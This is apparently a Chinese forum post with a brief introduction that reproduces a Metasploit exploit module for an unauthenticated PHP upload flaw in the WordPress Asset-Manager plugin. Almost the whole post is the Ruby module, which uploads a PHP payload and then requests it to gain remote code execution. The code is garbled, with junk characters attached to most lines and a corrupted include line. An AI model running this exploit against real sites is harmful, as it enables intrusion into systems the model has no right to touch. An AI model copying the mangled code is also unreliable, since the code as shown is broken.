这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
3 N8 j& M, L7 `9 i+ f* i) R5 f0 y$ _$ b2 o
##; _) y7 U! T+ E7 b
# This file is part of the Metasploit Framework and may be subject to( i- K2 N* r: G1 H0 c- X' r0 ^
# redistribution and commercial restrictions. Please see the Metasploit8 K1 m- C+ a( A* V) f0 Z
# Framework web site for more information on licensing and terms of use.
8 M2 o& o) p9 z2 B( P3 o. B# http://metasploit.com/framework// W9 M" J. E" C
##6 B+ t$ v6 N' ^( [& m- J0 K
4 s! d; t" r. ^. P `3 Z' `0 _
require 'msf/core'" i1 L; a3 `7 l: ^4 c& s0 {8 j- s
require 'msf/core/exploit/php_exe'6 _: o; D0 S( D0 n) l- i$ [
8 D8 `: t3 w- [, j' s- i/ c
class Metasploit3 < Msf::Exploit::Remote
/ a) x+ P% }* D4 q, K2 o Rank = ExcellentRanking1 G# Y) u, Q5 {7 @
; o, n! i' K, ` include Msf::Exploit::Remote::HttpClient! u+ M7 f, x; F3 A+ S; ^5 F% V
include Msf::Exploit: hpEXE
; o. s- M! i& S o - U4 a' h% A' N& S. B, \# C
def initialize(info = {})
: N2 N' I# R" \$ [' {5 y# s5 q super(update_info(info,( {: ?: w4 B/ e2 C8 b
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',3 }6 i: S4 i% f( X: e
'Description' => %q{7 \- m' g, K% N$ r0 f0 \2 z+ Q0 ^
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
6 T' w7 O9 O4 I. G3 y; b plugin. By abusing the upload.php file, a malicious user can upload a file to a b O# F6 g9 W/ _8 N9 P
temp directory without authentication, which results in arbitrary code execution.5 ~- Y0 z6 C* j$ _
},
+ Z; l3 V) n" E* T- m' l4 Q5 J 'Author' =>8 t$ Z9 t% b( }% ]1 P3 J
[
( x9 k$ O# W# {3 V; G* q 'Sammy FORGIT', # initial discovery
0 {0 @( A: e4 R0 m% X: }7 a! v 'James Fitts <fitts.james[at]gmail.com>' # metasploit module
# j; t9 T4 A& J, C8 y- r ],( l0 B/ p* i# b8 k. _- f8 w! Q) |4 s8 c
'License' => MSF_LICENSE,
: M$ U- x$ j/ F1 A$ o2 S 'References' =>% C$ |# `8 s2 }( v
[4 v1 C/ S. E# v ~
[ 'OSVDB', '82653' ],
1 r) F* u' ~; E. ~ [ 'BID', '53809' ],! C! G0 \/ c( a) ?# R; y
[ 'EDB', '18993' ],
0 J/ }, n0 i7 Q4 b# t: _) r [ 'URL', 'http:// www.myhack58.com /' ]
( G! k" b& U8 r1 M" K5 E2 E0 N ],
& |% d5 f) g& s 'Payload' =>
( j2 k' _& G& g/ w R& ~ {6 j# a9 ~2 u- F( B
'BadChars' => "\x00",
; a9 ^( g; Y+ ~, p+ _ },) d$ G9 p6 z t! P' w, G
'Platform' => 'php',
D+ ^; c+ H/ P; e& X7 g# c 'Arch' => ARCH_PHP,
/ ^2 l7 P, A6 A, k& ^ 'Targets' =>$ Q( E' Y$ N0 }
[: u$ o1 p7 V: Z) {1 S
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],% h" ? |; ^% r- S5 I/ n, P
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]4 ]1 }" }1 q8 n. V8 R
],
; a- m( o+ u1 z% a4 u9 N) A. p, A 'DefaultTarget' => 0,
! p' w) D4 O. T y6 B( U% p$ m 'DisclosureDate' => 'May 26 2012'))! h9 J3 {. O$ U% i! C( _8 n5 N- {( K
/ @- d9 P! N0 }% l8 s6 P register_options(; ]9 n: d0 ~* U0 Z
[
9 h$ y, M: w, z: H OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])- J4 Q6 l w' w3 p4 y
], self.class)
5 {+ r& A; R" a4 L/ P! I( b end
, m/ a1 l0 X, @5 r t+ q w8 x
_. b. p' ?& b4 [ def exploit
* U3 L* a: ]& J- p* k" V uri = target_uri.path
8 P, w& g& ?4 {9 o S" C uri << '/' if uri[-1,1] != '/'
9 @+ J8 o8 Y. L0 p. _6 ]) U peer = "#{rhost}:#{rport}"
, _2 ~$ A- g, t: _- }, C+ T3 n payload_name = "#{rand_text_alpha(5)}.php"
' z; h& P2 o- h) f, S; m! D php_payload = get_write_exec_payload(:unlink_self=>true)
, T1 Q1 }, `: A8 v( ^% E3 T * N" j, @0 h A4 P$ S
data = Rex::MIME::Message.new/ O6 {" @# J3 z% y! x
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
4 e0 z; ~ d- w& d" G. u+ S post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')' a' l& S' ^# A+ I: Y4 ~- g
+ o: x' X& ?4 U7 n print_status("#{peer} - Uploading payload #{payload_name}")
) ~" Y H1 q/ ^6 E' s: @ res = send_request_cgi({
' }. k: m- `, T$ r$ A0 z' r% l 'method' => 'POST',
" B1 T) p# \& k 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",& X$ q" d3 d: C3 B- q* E
'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ X! g6 i, \0 y6 l 'data' => post_data
! Z* M8 x) m9 u& U })% T( ]4 t' ^1 W4 ?" J3 N
7 b; g4 @/ H2 S% i7 S8 N( i H7 M6 \
if not res or res.code != 200 or res.body !~ /#{payload_name}/+ N2 }* Z' f8 Y! y ]+ ^; N5 X, y
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
9 p6 o3 x9 ?2 @end3 P. l8 _7 _3 L1 j3 ?- d) b
4 H2 i- L- F1 w/ }
print_status("#{peer} - Executing payload #{payload_name}")( u6 B% [, d% p
res = send_request_raw({
- y2 m5 a7 _( n7 _3 ^8 `, { 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
" J2 `7 [0 g& q1 P9 g& X, _0 u$ c& v 'method' => 'GET'$ }* r4 z8 O- i6 T: R O7 d; x/ K
})
6 u# X8 g- T/ p$ ~+ G$ y1 D
/ R& g: v- n/ o2 r+ S) L0 m2 [ if res and res.code != 200! z0 ~$ }- E: L% C6 Y
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")+ k. G4 R+ z# m* S5 k' Z! N' Q
end9 l) I1 I0 _8 K. F9 p
end$ S0 I6 o" c+ y& H b0 {( o: L5 y
end1 Z1 `: B% `( g3 J
|
发表于 2012-12-31 09:22:33
收藏
支持
反对